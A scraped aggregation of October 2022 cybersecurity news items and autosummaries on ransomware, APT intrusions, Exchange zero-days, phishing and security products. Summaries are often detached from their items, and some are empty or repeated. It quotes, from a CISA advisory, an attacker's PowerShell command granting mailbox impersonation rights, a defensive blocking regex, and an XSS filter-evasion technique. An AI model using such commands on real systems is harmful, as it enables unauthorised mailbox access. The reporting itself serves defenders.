Attack details Security researchers at cybersecurity company Sophos explain that the abused MSI graphics driver offers I/O control codes directly accessible by user-mode processes, which violates Microsoft’s security guidelines on kernel memory access. "Avast released a free decryptor for variants of the Hades ransomware tracked as ‘MafiaWare666’, ‘Jcrypt’, ‘RIP Lmao’, and ‘BrutusptCrypt,’ . Avast has released a decryptor for variants of the Hades ransomware known as ‘MafiaWare666’, ‘Jcrypt’, ‘RIP Lmao’, and ‘BrutusptCrypt,’ which can allow the victims of these ransomware strains to recover their files without paying the […]
The post Avast releases a free decryptor for some Hades ransomware variants appeared first on Security Affairs.
"Autosummary:
The malware samples analyzed by the researchers append the following extensions the the filename of the encrypted files: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch Once the MafiaWare666 variant completes the encrypted process, it displays a window that provides payment instructions to the victims. "Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances […]
The post New Maggie malware already infected over 250 Microsoft SQL servers appeared first on Security Affairs.
"Autosummary:
Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States. "Categories: News Tags: malware Tags: ZINC Tags: microsoft Tags: infection Tags: C&C Tags: open source Tags: job offer Tags: fake Tags: LinkedIn A North Korean ZINC group is accused of creating compromised versions of KiTTY, PuTTY, TightVNC, and other popular open-source software apps |
The post Bogus job offers hide trojanised open-source software appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 5, 2022 by A North Korean ZINC group is accused of creating compromised versions of KiTTY, PuTTY, TightVNC, and other popular open-source software apps Microsoft researchers are warning of fake job offers where the only actual compensation available is a golden handshake of malware and trickery.You know, the kind of people who might have access confidential information, sensitive data, journalists, important passwords etc. "Autosummary:
These variants include the following extensions and strings appended/prepended to an encrypted file"s name: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch If you were affected by one of these variants, you can download the free decryptor from here, run the executable, select the drive that holds the encrypted files, and point the tool to a sample pair of encrypted and original files. "HackNotice has added continuous phishing capability that educates employees about phishing and social engineering attacks while helping businesses to achieve cybersecurity compliance. HackNotice’s phishing helps people understand and recognize the different types of attacks threat actors can deploy. Writing, sending, and reviewing phishing campaigns is often a laborious process for the security team, with expensive phishing platforms leaving much to be desired. HackNotice’s phishing, deployed with the press of a button, empowers people to identify … More
The post HackNotice’s phishing capability empowers users to identify phishing emails appeared first on Help Net Security.
"Autosummary:
"Critical Insight has released an end-to-end offering that will evolve the security programs of healthcare, public sector, and SMB organizations. For IT Teams constrained in their ability to handle the ever-changing complexities of cybersecurity, Critical Insight is putting all of its services under one delivery model: Cybersecurity-as-a-Service. Cybersecurity-as-a-Service integrates Critical Insight’s software, professional and technology services into a unified solution that allows customers to prepare for an attack with risk assessments, technical testing and training; … More
The post Critical Insight releases Cybersecurity-as-a-Service to protect organizations from threats appeared first on Help Net Security.
"Autosummary:
"To withstand cyberattacks, businesses must continually update internal systems and avoid hasty tech upgrades that might open the door to attackers. In this Help Net Security video, Phillip Verheyden, Security Engineer at Shipwell, discusses the challenges technology organizations face when investing in cybersecurity and offers tips for CISOs, from securing development to dealing with phishing attacks.
The post What should investing in cybersecurity look like for a technology organization? appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Austin Jones, Principal Software Engineer at ThreatX, explains what HTTP request smuggling is, and discusses a recently uncovered HTTP request smuggling vulnerability in Node.js (CVE-2022-35256). This vulnerability allows an attacker to bypass security controls on the target server to conduct any nefarious activities.
The post HTTP request smuggling vulnerability in Node.js (CVE-2022-35256) appeared first on Help Net Security.
"Autosummary:
"The mitigation shared by Microsoft for the two recently disclosed Exchange zero-day vulnerabilities can be bypassed, expert warns. Last week, Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers at cybersecurity firm GTSC are being actively exploited in the wild. The first flaw, tracked as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) issue. […]
The post Microsoft mitigations for recently disclosed Exchange zero-days can be easily bypassed appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnChange the condition input from {URL} to {REQUEST_URI} Microsoft also recommends customers block the following Remote PowerShell ports: HTTP: 5985 HTTPS: 5986 Microsoft also recommends Exchange Server customers disable remote PowerShell access for non-admin users in the organization. "Researchers link recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10) Bronze Starlight, has been active since mid-2021, in June researchers from Secureworks reported that the APT group is deploying […]
The post Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group appeared first on Security Affairs.
"Autosummary:
Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10) Bronze Starlight, has been active since mid-2021, in June researchers from Secureworks reported that the APT group is deploying post-intrusion ransomware families to cover up the cyber espionage operations. "Autosummary:
All it took was a simple social engineering message – something like, "Hey Bob, I"m from the IT team, and we need to check something on your PC, so I"m sending you a tool for you to run. And it"s not just users that need educating – you should reinforce these practices in your security team too, by covering patching, permissions, and overall security positioning. "Autosummary:
"Autosummary:
“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64- encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique, to bypass Cross-Site Scripting (XSS) filters,” details Trend Micro’s report. "Autosummary:
After not receiving a payment, the hacker leaked the data of 10,000 customers on a hacking forum that included names, addresses, email addresses, phone numbers, and dates of birth. "Autosummary:
"Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development," explained the Microsoft threat intelligence researchers. "Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
• Enforce multifactor authentication (MFA) on all user accounts.
• Implement network segmentation to separate network segments based on role and functionality.
• Update software, including operating systems, applications, and firmware, on network assets.
• Audit account usage.
From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.
This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.
Download the PDF version of this report: pdf, 692 KB
For a downloada "
Autosummary:
The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange: powershell add-pssnapin *exchange*;New-ManagementRoleAssignment - name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account> This command gave the service account the ability to access other users’ mailboxes.For a downloadable copy of IOCs, see the following files: This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. DETECTION Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to: Monitor logs for connections from unusual VPSs and VPNs. In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26868, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server.Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).To detect use of compromised credentials in combination with a VPS, follow the steps below: Review logs for "impossible logins," such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location. including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect). Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques Initial Access Technique Title ID Use Valid Accounts T1078 Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). "Autosummary:
When informing the media of the new directive, CISA director Jen Easterly highlighted the SolarWinds attack, where a sophisticated hacking group was able to use a poisoned update to the network management software to compromise networks inside government departments, critical infrastructure, and the private sector for months. "Autosummary:
"North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on exploit in a Dell firmware driver dbutil_2_3.sys, ESET researchers warn. The discovery was made by ESET researchers while […]
The post Lazarus APT employed an exploit in a Dell firmware driver in recent attacks appeared first on Security Affairs.
"Autosummary:
“The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc., basically blinding security solutions in a very generic and robust way.” "Autosummary:
Vachon-Desjardins, a 34 Canadian man extradited from Quebec, was sentenced today in a Florida court after pleading guilty to "Conspiracy to commit Computer Fraud", "Conspiracy to Commit Wire Fraud", "Intentional Damage to Protected Computer," and "Transmitting a Demand in Relation to Damaging a Protected Computer." "Autosummary:
The Asahi Shimbun suggests that this may have been a deepfake video, although it’s unclear how they came to this determination: She did not realize at the time that it was a “deepfake” video, and her romantic feelings toward the imposter intensified. "ADVA has launched Adva Network Security, a specialist security company committed to protecting mission-critical communication networks from cyberattacks. The new separate company will complement ADVA’s networking technology portfolio with proven and approved security controls to protect mission-critical connectivity applications. It will develop, produce and integrate encryption technology able to withstand increasingly sophisticated threats. With its own IT infrastructure and secure data center facilities in Germany, Adva Network Security will collaborate with national security organizations to … More
The post ADVA launches network security company to protect mission-critical cloud traffic from cyberattacks appeared first on Help Net Security.
"Autosummary:
What’s more, the company offers high-bandwidth quantum-safe transport, enabling customers to apply future-proof security solutions to their infrastructure and guaranteeing that valuable information cannot be seized and stored today, ready to be deciphered when large-scale quantum computers become readily accessible. "Autosummary:
Identifying suspicious privileged account use after resetting passwords or applying user account mitigations Searching for unusual activity in typically dormant accounts Searching for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity The joint report from CISA, FBI, and NSA shares a set of YARA rules created to detect activity from this particular threat actor and indicators of compromise for the tools used in the attack: CovalentStealer, HyperBro, and China Chopper. The use of compromised credentials with a VPS may also indicate a potential breach that could be uncovered by: Reviewing logs for "impossible logins," e.g. logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location Searching for "impossible travel," which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart. "Categories: News Categories: Scams Tags: IRS Tags: smishing The Internal Revenue Service has issued a warning for taxpayers over a recent increase in IRS-themed smishing scams. |
The post Huge increase in smishing scams, warns IRS appeared first on Malwarebytes Labs.
"Autosummary:
" How to avoid falling for a smishing scam We can"t stop smishing completely, but we can take some steps to significantly reduce the chance of falling victim: Firstly, it"s important to keep in mind that the IRS does not send emails or texts asking for personal or financial information or account numbers. If you’re being asked to do something, like enter your details, transfer money, or similar, the very best thing you can do is contact the "sender" directly via a known method you trust. "Categories: News Tags: compromise Tags: ransomware Tags: leak Tags: extortion Tags: LAUSD Data stolen from Los Angeles Unified School District has been leaked online, after staff refused to pay the ransom related to a ransomware attack. |
The post Ransomware-affected school district refuses to pay, gets stolen data released appeared first on Malwarebytes Labs.
"Autosummary:
I understand there will be many opinions on this matter but, simply said, negotiating with cybercriminals attempting to extort education dollars from our kids, teachers, and staff will never be a justifiable option. Criminals quickly realised they have more chance of payment if they make additional threats, like leaking the stolen data, selling it on, or even hitting the target with DDoS attacks to knock out their systems and networks. "Categories: Threat Intelligence In September, LockBit accounted for almost half of all known ransomware attacks. |
The post Ransomware review: September 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by industry sector, September 2022 LockBit 3.0 leak A few months ago, the LockBit gang released version 3.0 of its ransomware, LockBit 3.0 Black, which was based on source code from BlackMatter ransomware. Known ransomware attacks by gang, September 2022 LockBit was involved in almost six times as many attacks as the next most prevalent ransomware, Black Basta, and almost as many attacks as every other variant combined, accounting for 48 percent of known attacks. "AlphaSOC announced its new AlphaSOC Analytics Engine (AE) solution, a differentiated cloud-native network traffic analysis (NTA) product that uniquely identifies compromised workloads across Amazon Web Services, Microsoft Azure, and Google Cloud Platform. Threat actors bypass existing controls by using novel command and control (C2) infrastructure that is not recognized by legacy security products. Data can also be exfiltrated from victim cloud environments via DNS tunneling, ICMP tunneling, and anonymizing circuit protocols (e.g., Tor, I2P, Freenet) … More
The post AlphaSOC Analytics Engine identifies emerging threats in near real-time appeared first on Help Net Security.
"Autosummary:
“With AlphaSOC AE we are moving the industry from reactive identification of known threats, such as a domain or IP address associated with a threat actor, towards proactive identification of threats, such as a compute instance beaconing to a newly registered domain which is unique to the customer environment and has suspicious properties,” said Chris McNab, CEO and co-founder, AlphaSOC. "ESET launches a new cloud and XDR solutions for Managed Service Providers (MSPs). By expanding the ESET PROTECT Platform to include ESET Inspect and ESET Inspect Cloud, MSPs and their business customers will now have access to dedicated XDR security solutions – available on prem or via the cloud. ESET also launched an all new ESET Direct Endpoint Management plugin for Kaseya VSA, as well as Native ARM Support for macOS. “With this launch, our … More
The post ESET unveils new cloud and XDR solutions to improve cybersecurity for MSPs appeared first on Help Net Security.
"Autosummary:
This launch includes: ESET Inspect Cloud for MSP: Previously released for the enterprise market, ESET Inspect Cloud is a cloud-based tool that enables MSPs to evolve the ESET PROTECT Platform into an XDR solution for enterprise-grade security and risk management capabilities, including advanced threat hunting, incident response, full network visibility, cloud-based threat defense, and more. “When businesses need hardened, next-generation cybersecurity solutions, ESET’s approach to multilayered security plus real time intelligence sets us apart,” said Grant. “We have hundreds of experts and researchers in 13 R&D centers around the world who are analyzing never-before-seen threats, tracking sophisticated APT group activity and creating resources for our partner community that keep them up to date on the latest cybersecurity concerns. "For some analysts, memory analysis is only an optional step in cybersecurity investigations. Their reasons are simple. One: Handling memory and volatile data is a complex endeavor, made more difficult by legacy tools. Two: The average analyst is a highly educated individual but is generally not an expert in memory architecture. That knowledge is often reserved for systems engineers. And three: The few analysts who do possess that expertise are writing code or concentrate on … More
The post Detecting fileless malware infections is becoming easier appeared first on Help Net Security.
"Autosummary:
Fileless malware evades widely used endpoint security solutions When they’re under pressure after a threat has been detected, the instinct many security teams have is to immediately focus on containing it by shutting down and isolating systems. Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems.By neglecting memory analysis, they risk exposing their systems to fileless malware — a threat that will silently collect valuable information and allow attackers to move laterally between systems while leaving no footprints for incident response tools to identify. "A cybersecurity industry veteran, Praveen Singh is the co-founder and Chief Information Security Advisor at CyberPWN Technologies, a digital defense consulting firm. In this interview with Help Net Security, he offers insight for anyone interested in building their own cybersecurity consultancy. You have experience across a variety of cybersecurity roles. What motivated you to co-found a company? Building or co-founding a company requires a leap into the unknown, but also significant amounts of fortitude, dedication, … More
The post How to start and grow a cybersecurity consultancy appeared first on Help Net Security.
"Autosummary:
I also had to educate myself in critical areas such as finance, marketing, and sales by reading business advice websites, attending events, joining business groups, and seeking mentors. We have a vendor-agnostic approach, and we always provide a fair scorecard, which pivots around their critical business requirements, regulatory needs, and risk mitigation strategies.With our extensive experience in the field of cybersecurity and consultative approach, we partner with global clients, start-ups, and Fortune 500 companies, aiding them in their cyber transformation journey and helping them achieve strategic business objectives. Building or co-founding a company requires a leap into the unknown, but also significant amounts of fortitude, dedication, drive, and passion.Many factors influence what the outcome will be and when the ultimate goal will be achieved – the type of business, the industry you operate in, the size of the company, investment capital, etc. "Nearly a quarter of businesses have suffered a ransomware attack, with a fifth occurring in the past 12 months, according to Hornetsecurity. The 2022 Ransomware Report, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year. Cyberattacks are happening more frequently. Last year’s ransomware survey revealed that 21% of companies experienced an attack. This year it rose by three percent … More
The post Many IT pros don’t think a ransomware attack can impact Microsoft 365 data appeared first on Help Net Security.
"Autosummary:
The 2022 Ransomware Report, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year. "Trustwave researchers discovered two XSS flaws in Canon Medical ’s Vitrea View tool that could expose patient information. During a penetration test, Trustwave Spiderlabs’ researchers discovered two reflected cross-site scripting (XSS) vulnerabilities, collectively as CVE-2022-37461, in third-party software for Canon Medical’s Vitrea View. The Vitrea View tool allows viewing and securely share medical images through […]
The post Reflected XSS bugs in Canon Medical ’s Vitrea View could expose patient info appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "CVE-2022-41040 and CVE-2022-41082, the two exploited MS Exchange zero-days that still have no official fix, have been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. But mitigating the risk of exploitation until patches are ready will require patience and doggedness, as Microsoft is still revising its advice to admins and network defenders, and still working on the patches. Exchange zero-days: The current situation CVE-2022-41040 and CVE-2022-41082 have been publicly documented last Wednesday, by researchers with … More
The post MS Exchange zero-days: The calm before the storm? appeared first on Help Net Security.
"Autosummary:
The current situation CVE-2022-41040 and CVE-2022-41082 have been publicly documented last Wednesday, by researchers with Vietnamese company GTSC, and Microsoft soon after sprung into (discernible) action by offering customer guidance, followed by an analysis of the attacks exploiting the two vulnerabilities. "59% of consumers are more concerned about becoming a victim of fraud now than they were in 2021, according to a research released by Paysafe. This Help Net Security video reveals how consumers across North America, Latin America and Europe are prioritising security over convenience when making online purchases, as the impact of rising inflation and energy prices continues to fuel financial worries.
The post Financial crises boost fraud rates, making online consumers more cautious appeared first on Help Net Security.
"Autosummary:
"Autosummary:
CVE-2022-41082 has the same high-severity score but it can be used for remote code execution on vulnerable on-premise Microsoft Exchange Servers by an attacker with “privileges that provide basic user capabilities” (settings and files owned by the user). "Autosummary:
"Autosummary:
Phishing Microsoft Teams users with Chrome"s app mode (mrd0x.com) Depending on the use case, an attacker can also use the Browser-in-the-Browser technique to insert a fake address bar by adding the required HTML/CSS, and creating clones of software, like, for example, Microsoft 365, Microsoft Teams, or even VPN login prompts. "Autosummary:
"Autosummary:
"Autosummary:
These accounts were under the names "jml4da", "TimWallbey", "Liu Zhao Khin (0daylabin)", "R007er", and "spher0x." "A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Comm100 is a provider of customer service and communication products […]
The post Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor appeared first on Security Affairs.
"Autosummary:
The malicious installer was used to infect organizations in multiple sectors, including the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. "Categories: Exploits and vulnerabilities Categories: News Tags: Atlassian Tags: Bitbucket Tags: git Tags: CVE-2022-36804 Tags: RCE Tags: read permission International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center |
The post Actively exploited vulnerability in Bitbucket Server and Data Center appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 3, 2022 by International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to the catalog of known to be exploited vulnerabilities. "Categories: News Tags: romance scam Tags: deepfake Tags: mark ruffalo Tags: manga Tags: theft Tags: online Tags: social media We take a look at a romance scammer getting ahead of the game and using deepfakes to steal a huge amount of money from a victim. |
The post Romance scammer deepfakes Mark Ruffalo to con elderly artist appeared first on Malwarebytes Labs.
"Autosummary:
CBR reports the artist said, in relation to the faker, that "...he respected my work, and he said that I, this old lady, am beautiful".It may not sound much, but to someone in their 70s, burnt in the past by an abusive marriage, and unfamiliar with internet scams, it was just what the fake doctor ordered. Tips for avoiding romance scams Romance scams continue to be a major problem, and it’s very much a low effort, big reward attack which is why it pops up so frequently. "Autosummary:
The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. "Autosummary:
" The use of Cheerscrypt is the latest addition to a long list of ransomware families previously deployed by the group in little over a year, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. "Autosummary:
"The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing, etc., basically blinding security solutions in a very generic and robust way," Kálnai said. "Autosummary:
"On or about August 26, 2022, Dalke requested $85,000 in return for additional information in his possession," the DoJ said, stating, "Dalke agreed to transmit additional information using a secure connection set up by the FBI at a public location in Denver," eventually leading to his capture. "SpyCast: Cross-platform mDNS enumeration tool SpyCast is a cross-platform mDNS enumeration tool that can work either in active mode by recursively querying services or in passive mode by only listening to multicast packets. Attackers use novel technique, malware to compromise hypervisors and virtual machines Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. To encrypt or to destroy? Ransomware … More
The post Week in review: MS Exchange zero-days exploited, AD attack paths, developing secure APIs appeared first on Help Net Security.
"Autosummary:
The significance of parallel tasks execution for security teams In this Help Net Security video, Leonid Belkind, CTO at Torq, discusses parallel execution, which enables security operations professionals to execute more tasks simultaneously to enrich, analyze, contain, and resolve security threats. New infosec products of the week: September 30, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Illumio, Malwarebytes, Netography, TransUnion, and Truecaller. "German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany’s Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users via phishing attacks along with a two accomplices who are suspected. The phishing campaigns were conducted between October 3, 2020, and May 29, […]
The post German police identified a gang that stole €4 million via phishing attacks appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Kommersant"s source stated that these SIM cards work in the networks of MTS, MegaFon, Beeline, Tele2, and Yota, and concern "pay-as-you-use" programs. "Another US defense contractor suffered a data breach, the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department of Defense. The company supports intelligence, defense, and geospatial organizations. The company has more than 1,200 employees in locations worldwide. BlackCat added NJVC to […]
The post BlackCat ransomware gang claims to have hacked US defense contractor NJVC appeared first on Security Affairs.
"Autosummary:
🌐 BlackCat (ALPHV) #Ransomware team added NJVC to the victims" list 🚨 NJVC is an information technology (IT) company supporting the federal government and the United States Department of Defense, with $290 Million in revenue from The United States 🇺🇸#Blackcat pic.twitter.com/RnsJPUUMLw — DarkFeed (@ido_cohen2) September 29, 2022 BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company will not pay the ransom. "Autosummary:
While BleepingComputer has not examined any of the data leaked today, some of the folders indicate they may contain sensitive information, such as "ssn", "Secret and Confidential", "Passport", and "Incident." "LMG Security has expanded its selection of cybersecurity advisory, testing, and training services with a new line of cybersecurity solutions. These solutions are designed to reduce the burden organizations face from implementing or managing cybersecurity technology, as well as create fast, easy access to skilled cybersecurity staff to augment internal teams. LMG Security offers the following new solutions and services: Virtual CISO and staff augmentation: Organizations struggle to find and retain cybersecurity talent. LMG Security … More
The post LMG Security expands its cybersecurity solutions and services appeared first on Help Net Security.
"Autosummary:
Endpoint detection and response implementation: LMG Security implements and seamlessly integrates an endpoint detection and response solution that helps organizations defend against zero-day attacks, supply chain vulnerabilities, and other common cybersecurity threats. "Autosummary:
It has also published a script for the following URL Rewrite mitigation steps that it said is "successful in breaking current attack chains" - Open IIS Manager Select Default Web Site In the Feature View, click URL Rewrite In the Actions pane on the right-hand side, click Add Rule(s)… Select Request Blocking and click OK Add the string ".*autodiscover\.json.*\@.*Powershell.*" (excluding quotes) Select Regular Expression under Using Select Abort Request under How to block and then click OK Expand the rule and select the rule with the pattern .*autodiscover\.json.*\@.*Powershell.* and click Edit under Conditions. "Autosummary:
"CISA added a recently disclosed flaw in Atlassian Bitbucket Server, tracked as CVE-2022-36804, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a recently disclosed critical vulnerability in Atlassian’s Bitbucket Server and Data Center to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant […]
The post CISA adds Atlassian Bitbucket Server flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"A hacker group called Guacamaya stole classified government information from multiple military and government agencies across several Latin American countries. Among the data stolen by a group of hackers called Guacamaya (macaw in Spanish) there was a huge trove of emails from Mexico’s Defense Department, which shed the light on the poor resilience of the […]
The post Guacamaya hacktivists stole sensitive data from Mexico and Latin American countries appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc., basically blinding security solutions in a very generic and robust way," continued ESET"s report. "Trust Stamp has unveiled its new government-focused, privacy-first identity technology, Privtech, and reports it has received registered trademark status for the Privtech solution by the US Patent and Trademark Office. The technology provides four customizable levels of privacy protection using the Company’s existing Privtech Certified structure and offers government agencies the ability to verify identity and protect against fraud, while minimizing the data collected and providing transparency as to its use. Gareth Genner, Chief Executive … More
The post Trust Stamp Privtech helps government agencies protect against fraud appeared first on Help Net Security.
"Autosummary:
"The age of caller ID hasn’t entirely lived up to its promise, because it’s still not clear whether a call is truly important. Some 86% of Americans report they only answer calls if they can identify the person or business calling. Now they don’t have to make the distinction on their own. Truecaller has launched Truecaller Assistant, an innovation that leverages machine learning, speech-to-text, and natural language processing technologies to create call-screening solution. Truecaller Assistant, … More
The post Truecaller Assistant filters out fraud and scam calls appeared first on Help Net Security.
"Autosummary:
Truecaller Assistant, available on both Android and iOS, is a customizable, interactive, digital receptionist that empowers users to answer important calls and avoid unwanted ones. "Niagara Networks has unveiled that Niagara Networks’ 3808E multifunctional Hybrid Packet Broker solution introduces a full lineup of the 40G and 100G BiDi bypass capabilities to enable ultra capacity over an existing infrastructure and flexibility across data center deployments. The 3808E multifunctional Hybrid Packet Broker increases operational efficiency and enables always-on high-availability of complex inline cybersecurity tools. With the new capabilities of Niagara Networks’ solution, data center operators will not need to add optical fiber … More
The post Niagara Networks increase capacity of its threat detection security stack appeared first on Help Net Security.
"Autosummary:
"Impinj announced the Impinj Authenticity solution engine to provide real-time, high-volume product authentication for brands and their customers. A new Impinj Authenticity cryptographically authenticates everyday items – such as retail merchandise, automotive parts, and medications – to help prevent counterfeits, ensure product safety, and secure the supply chain. “The Impinj Authenticity solution engine leverages the whole Impinj platform, including Impinj endpoint ICs, reader ICs, readers, cloud services, and partner ecosystem, to cryptographically protect every item … More
The post Impinj Authenticity provides product authentication to prevent counterfeits appeared first on Help Net Security.
"Autosummary:
“The Impinj Authenticity solution engine leverages the whole Impinj platform, including Impinj endpoint ICs, reader ICs, readers, cloud services, and partner ecosystem, to cryptographically protect every item that enterprises manufacture, transport, and sell. Proven expertise and RAIN RFID leadership Purpose-built for product authentication, the Impinj Authenticity solution engine leverages the Impinj platform, comprising RAIN RFID tag chips, reader chips, readers, cloud services, and a global partner ecosystem. "Zyxel Communications has launched EX5512-T0 AX6000 WiFi 6 Multi-Gigabit Ethernet gateway. The new dual-band wireless 11AX gateway, which enables service providers to deliver 2.5 Gigabit Ethernet internet access to subscribers’ ultra-connected homes, is the first of a complete portfolio of Zyxel multi-gigabit WiFi6 and WiFi 6E solutions, including 1G, 2.5G, and 10G gateways, that will become announced this year. Equipped with 2.5G Ethernet WAN and LAN ports to eliminate network bottlenecks, EX5512-T0 leverages WiFi 6 … More
The post Zyxel EX5512-T0 AX6000 WiFi 6 Ethernet gateway enhances network capacity for service providers appeared first on Help Net Security.
"Autosummary:
Features and benefits of EX5512-T0 AX6000 WiFi 6 Multi-Gigabit Ethernet gateway include: Next-generation technology to support bandwidth-intensive applications – EX5512-T0 supports the 802.11ax (WiFi 6) standard to deliver throughput speeds up to 6000 Mbps, enabling operators to provide UHD 4K/8K services, and maximize the performance of next-generation, high-bandwidth, latency-sensitive applications. "Cloud security became much more complicated as COVID-19 hit and remote/hybrid workforces emerged. Organizations are struggling to sufficiently secure new cloud environments implemented during the pandemic while maintaining legacy equipment and trying to adapt their overall security strategy to the evolving landscape. In this Help Net Security video, Ryan Sydlik, Security Engineer at Telos, explores where cloud security stands today, what challenges remain from the pandemic, and how organizations can address them.
The post The current state of cloud security appeared first on Help Net Security.
"Autosummary:
"Fortifying cybersecurity defenses remains a work in progress for many organizations, who acknowledge their shortcomings but have yet to commit the necessary resources to the effort, according to new research from CompTIA. While a majority of respondents in each of seven geographic regions feels that their company’s cybersecurity is satisfactory, CompTIA’s “State of Cybersecurity” shows that a much smaller number rank the situation as “completely satisfactory.” Nearly everyone feels that there is room for improvement. … More
The post Top issues driving cybersecurity: Growing number of cybercriminals, variety of attacks appeared first on Help Net Security.
"Autosummary:
